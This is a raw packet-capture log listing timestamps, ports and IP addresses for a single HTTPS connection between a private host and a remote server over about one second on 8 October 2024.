Oct 8, 2024 20:52:16.374097109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374141932 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374157906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374178886 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374208927 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374308109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374342918 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374377966 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374387026 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374399900 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374646902 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374670029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374727011 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374733925 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.374763966 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374764919 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.376638889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.376666069 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.376713037 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.376719952 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.376739979 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.376759052 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.377279997 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.377307892 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.377348900 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.377355099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.377382994 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.377396107 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.378562927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.378580093 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.378639936 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.378648043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.378690004 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.459892988 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.459911108 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.459985018 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.460007906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.460082054 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.460630894 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.460647106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.460695028 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.460702896 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.460732937 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.460752010 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461162090 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461179972 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461230993 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461237907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461287022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461316109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461332083 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461371899 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461379051 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461401939 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461416006 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461615086 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461630106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461678982 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461684942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.461709023 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.461765051 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.462501049 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.462517023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.462579966 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.462587118 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.462625027 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.464144945 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.464163065 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.464211941 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.464220047 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.464257002 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.464332104 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.465435982 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.465451956 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.465512037 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.465519905 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.465595961 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.546834946 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.546857119 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.546957016 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.546978951 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.547027111 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.547569036 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.547604084 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.547636986 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.547646046 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.547662020 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.547692060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548057079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548080921 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548137903 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548146009 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548194885 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548415899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548432112 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548475981 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548482895 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548518896 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548578978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548585892 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548630953 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548645020 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.548660994 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.548679113 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.549520016 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.549551964 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.549588919 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.549597979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.549623013 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.549638033 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.552350044 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.552366018 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.552419901 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.552433014 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.552444935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.552562952 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.612082958 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.612106085 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.612200022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.612225056 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.612235069 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.612469912 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.633730888 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.633759975 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.633831978 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.633851051 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.633898020 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.635780096 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.635807037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.635845900 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.635860920 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.635879040 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.635909081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.635998964 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636018038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636054039 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636061907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636090994 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636106014 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636648893 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636665106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636729956 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636738062 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636782885 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636799097 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636821985 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636850119 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636856079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.636883020 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.636898994 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.637765884 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.637784004 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.637831926 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.637840986 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.637871027 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.637895107 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.639170885 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.639185905 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.639239073 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.639246941 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.639297962 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.704571009 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.704590082 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.704649925 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.704670906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.704715014 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.720949888 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.720957994 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721059084 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.721077919 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721118927 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.721338034 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721364021 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721415997 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.721422911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721455097 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.721463919 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.721812010 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721821070 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721889019 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.721896887 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.721935034 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.722099066 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.722125053 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.722155094 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.722162008 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.722187042 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.722202063 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.722524881 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.722593069 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.722604036 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.722662926 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.724912882 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.724927902 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.725039005 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.725050926 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.725095034 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.726010084 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.726037025 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.726085901 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.726094961 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.726126909 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.726144075 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.791695118 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.791757107 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.791763067 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.791783094 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.791804075 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.791821003 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.807919979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.807940006 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808012009 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.808036089 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808079958 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.808299065 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808316946 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808358908 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.808367968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808398008 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.808413029 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.808861971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808876991 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808943987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.808953047 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.808979988 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.809001923 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.809083939 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.809098005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.809155941 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.809165955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.809207916 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.809587002 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.809602022 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.809670925 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.809680939 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.809806108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.811511040 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.811541080 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.811568975 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.811582088 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.811618090 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.811631918 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.813234091 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.813270092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.813311100 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.813322067 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.813352108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.813370943 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.884460926 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.884496927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.884548903 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.884576082 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.884598017 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.884613991 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.904419899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.904476881 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.904531002 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.904551029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.904581070 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.904597998 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.905252934 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.905281067 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.905318022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.905328035 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.905354977 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.905400038 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.905844927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.905864954 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.905921936 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.905930996 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.905967951 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.906560898 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.906604052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.906630039 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.906640053 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.906673908 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.906691074 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.906784058 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.906791925 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.906852961 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.906860113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.906887054 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.907166004 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.908135891 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.908150911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.908236980 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.908248901 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.908292055 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.911164999 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.911180019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.911264896 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.911277056 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.911454916 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.971173048 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.971191883 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.971298933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.971321106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.971365929 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.991905928 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.991925001 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.992012024 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.992036104 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.992084026 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.992959023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.992975950 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993029118 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993041039 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993081093 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993153095 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993170023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993220091 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993227005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993264914 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993309975 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993329048 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993377924 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993386030 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993426085 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993582010 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993598938 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993650913 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.993659019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.993697882 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.995260000 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.996563911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.996579885 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.996665955 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.996679068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.996720076 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.999152899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.999170065 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.999234915 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.999245882 CEST	443	49707	188.114.97.3	192.168.2.8
